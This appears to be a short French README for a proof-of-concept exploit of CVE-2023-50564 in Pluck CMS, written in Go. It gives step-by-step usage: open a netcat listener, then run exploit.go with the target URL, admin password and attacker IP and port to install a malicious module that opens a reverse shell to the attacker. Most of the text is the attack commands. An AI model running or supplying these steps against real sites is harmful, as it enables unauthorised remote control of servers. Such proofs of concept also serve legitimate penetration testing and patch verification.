
Exploit de preuve de concept pour CVE-2023-50564 ciblant Pluck CMS, livrant un shell inversé via l'installation d'un module malveillant.
Configurez d'abord un écouteur pour le shell inversé.
Terminal 1
nc -nlvp <lport>
Exécutez le script qui tentera d'installer un module pluck envoyant le shell inversé vers nous.
Terminal 2
go run exploit.go -url <url> -password <passwd> -i <your-ip> -p <lport>